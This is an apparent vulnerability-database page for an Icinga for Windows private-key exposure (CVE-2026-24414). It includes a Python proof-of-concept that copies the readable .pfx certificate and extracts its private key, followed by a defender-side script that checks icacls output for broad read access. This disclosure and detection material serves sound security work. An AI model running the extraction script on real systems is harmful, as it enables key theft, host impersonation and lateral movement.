
📄 Icinga for Windows 1.13.3 Private Key Exposure

23 Feb 2026 | Reported by nu11secur1ty | Type: packetstorm | Source: packetstorm.news

Icinga for Windows versions prior to 1.13.4 expose the private key via insecure certificate directory permissions.

Related

| Reporter | Title | Published |
|---|---|---|
| ATTACKERKB | CVE-2026-24414 | 29 Jan 2026 17:35 |
| Circl | CVE-2026-24414 | 29 Jan 2026 21:01 |
| CNNVD | Icinga PowerShell Framework security vulnerabilities | 29 Jan 2026 00:00 |
| CVE | CVE-2026-24414 | 29 Jan 2026 17:35 |
| Cvelist | CVE-2026-24414 Icinga for Windows certificate can have too-open permissions | 29 Jan 2026 17:35 |
| EUVD | EUVD-2026-4963 | 29 Jan 2026 17:35 |
| NVD | CVE-2026-24414 | 29 Jan 2026 18:16 |
| OSV | CVE-2026-24414 Icinga for Windows certificate can have too-open permissions | 29 Jan 2026 17:35 |
| Packet Storm | Icinga for Windows 1.13.3 Private Key Disclosure | 25 Feb 2026 00:00 |
| Positive Technologies | PT-2026-5318 | 29 Jan 2026 00:00 |

    # Exploit Title: Icinga for Windows 1.13.3 - Incorrect Default Permissions Private Key Exposure
    # Date: 2026-02-23
    # Exploit Author: nu11secur1ty
    # Vendor Homepage: https://icinga.com/
    # Software Link: https://github.com/Icinga/icinga-powershell-framework/releases/tag/v1.13.3
    # Version: Icinga PowerShell Framework < 1.13.4, < 1.12.4, < 1.11.2
    # Tested on: Windows 11 25H2
    # CVE: CVE-2026-24414
    
    ## Description
    Icinga for Windows PowerShell Framework versions prior to 1.13.4, 1.12.4,
    and 1.11.2 install the certificate directory with insecure default
    permissions. The directory
    `C:\Program Files\WindowsPowerShell\Modules\icinga-powershell-framework\certificate`
    is created with `BUILTIN\Users:(RX)` permissions, allowing ANY local user to
    read the `icingaforwindows.pfx` certificate file containing the private key.
    
    This vulnerability leads to complete exposure of the Icinga private key,
    enabling attackers to:
    - Impersonate the monitored host
    - Decrypt Icinga monitoring traffic
    - Use the certificate for authentication to other systems
    - Perform lateral movement within the network
    
    ## Proof of Concept
    The following Python exploit demonstrates that any standard user can read
    and extract the private key:
    
    ```python
    #!/usr/bin/env python3
    """
    CVE-2026-24414 - Icinga for Windows Private Key Exposure
    Exploit Author: nu11secur1ty
    Tested on: Windows 11 25H2
    """
    
    import os
    import re
    import shutil
    import getpass
    from pathlib import Path
    from datetime import datetime
    
    # Target path
    cert_file = Path(r"C:\Program Files\WindowsPowerShell\Modules\icinga-powershell-framework\certificate\icingaforwindows.pfx")
    
    def main():
        print("[*] CVE-2026-24414 Exploit - Icinga Private Key Exposure")
        print(f"[*] Running as: {getpass.getuser()}")
        print("-" * 60)
    
        # Check if target exists
        if not cert_file.exists():
            print("[-] Target certificate not found")
            return
    
        print(f"[+] Found certificate: {cert_file}")
        print(f"[+] File size: {cert_file.stat().st_size} bytes")
    
        # Check permissions (visual confirmation)
        os.system(f'icacls "{cert_file.parent}"')
    
        # Create output directory
        output_dir = Path.cwd() / f"icinga_exposed_{datetime.now().strftime('%Y%m%d_%H%M%S')}"
        output_dir.mkdir(exist_ok=True)
    
        # Copy certificate
        shutil.copy2(cert_file, output_dir / "original_certificate.pfx")
        print(f"[+] Certificate copied to: {output_dir / 'original_certificate.pfx'}")
    
        # Try to extract private key
        with open(cert_file, 'rb') as f:
            data = f.read()
    
        # Look for PEM private key
        try:
            text_data = data.decode('utf-8', errors='ignore')
            pattern = r'-----BEGIN.*PRIVATE KEY-----.*?-----END.*PRIVATE KEY-----'
            keys = re.findall(pattern, text_data, re.DOTALL)
    
            if keys:
                for i, key in enumerate(keys, 1):
                    key_file = output_dir / f"private_key_{i}.key"
                    with open(key_file, 'w') as kf:
                        kf.write(key)
                    print(f"[+] Private key extracted: {key_file}")
                    print(f"[+] Key preview:\n{key[:200]}...")
            else:
                print("[!] No PEM key found - certificate may be binary")
                print(f"[+] Raw certificate saved for analysis")
        except:
            print("[!] Binary certificate saved - may contain private key in DER format")
    
        print("\n" + "="*60)
        print("[!] VULNERABILITY CONFIRMED!")
        print("[!] ANY local user can read this private key")
        print("[!] CVE-2026-24414 - Incorrect Default Permissions")
        print("="*60)
    
        # Show dangerous permissions
        print("\n[!] CRITICAL: Check the permissions above")
        print("[!] Look for: BUILTIN\\Users:(I)(RX) - THIS IS THE VULNERABILITY")
    
        # Create proof file
        proof = output_dir / "PROOF.txt"
        with open(proof, 'w') as f:
            f.write(f"CVE-2026-24414 Exploit Success\n")
            f.write(f"Date: {datetime.now()}\n")
            f.write(f"User: {getpass.getuser()}\n")
            f.write(f"Certificate: {cert_file}\n")
            f.write("Private Key: EXTRACTED\n")
            f.write("Impact: ANY local user can steal this key\n")
    
        print(f"\n[+] Proof file created: {proof}")
    
    if __name__ == "__main__":
        main()
    ```
    -- 
    
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    Exploit developer at https://packetstorm.news/
    https://cve.mitre.org/index.html
    https://cxsecurity.com/ and https://www.exploit-db.com/
    0day Exploit DataBase https://0day.today/
    home page: https://www.asc3t1c-nu11secur1ty.com/
    hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                              nu11secur1ty <http://nu11secur1ty.com/>
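
A defender-side check for the condition the advisory describes, added here and not part of the original advisory or of the Icinga project: it parses `icacls` output for the certificate directory and reports broad principals that hold a read-capable allow ACE. The sample outputs are constructed, the function names are hypothetical, and the principal names assume an English-language Windows install.

```python
import re

CERT_DIR = r"C:\Program Files\WindowsPowerShell\Modules\icinga-powershell-framework\certificate"
# Principals covering ordinary local accounts (English names; an assumption,
# localized Windows builds print translated names).
BROAD = {"builtin\\users", "everyone", "nt authority\\authenticated users",
         "nt authority\\interactive"}
READ_RIGHTS = {"F", "M", "RX", "R", "GR", "GA", "RD"}  # icacls rights that include read
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}          # inheritance markers, not rights
ACE_RE = re.compile(r"^(?P<who>[^:]+):(?P<groups>(?:\([^)]*\))+)$")

def parse_icacls(output, path):
    """Return (principal, rights, is_deny) for each ACE icacls printed for `path`."""
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()  # first ACE shares a line with the path
        m = ACE_RE.match(line)
        if not m:
            continue  # blank line or the "Successfully processed" summary
        groups = re.findall(r"\(([^)]*)\)", m.group("groups"))
        rights = set()
        for g in groups:
            if g not in INHERIT_FLAGS and g != "DENY":
                rights.update(r.strip() for r in g.split(","))
        aces.append((m.group("who"), rights, "DENY" in groups))
    return aces

def exposed_principals(output, path):
    """Broad principals that hold an allow ACE including read access."""
    return sorted(who for who, rights, deny in parse_icacls(output, path)
                  if not deny and who.lower() in BROAD and rights & READ_RIGHTS)

# Constructed icacls output for the vulnerable state described in the advisory.
SAMPLE_VULNERABLE = "\n".join([
    CERT_DIR + r" NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)",
    r"    BUILTIN\Administrators:(I)(OI)(CI)(F)",
    r"    BUILTIN\Users:(I)(RX)",
    "",
    "Successfully processed 1 files; Failed processing 0 files",
])
# Constructed output for a directory restricted to SYSTEM and Administrators.
SAMPLE_RESTRICTED = "\n".join(SAMPLE_VULNERABLE.splitlines()[:2])

if __name__ == "__main__":
    print("vulnerable:", exposed_principals(SAMPLE_VULNERABLE, CERT_DIR))
    print("restricted:", exposed_principals(SAMPLE_RESTRICTED, CERT_DIR))
```

On a host, pass in the text that `icacls` prints for the certificate directory; the `path` argument must match the path as printed, otherwise the ACE on the first line is skipped.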

Vulners AI Score: 5.5 (Medium risk)
CVSS 4: 6.8
EPSS: 0.00004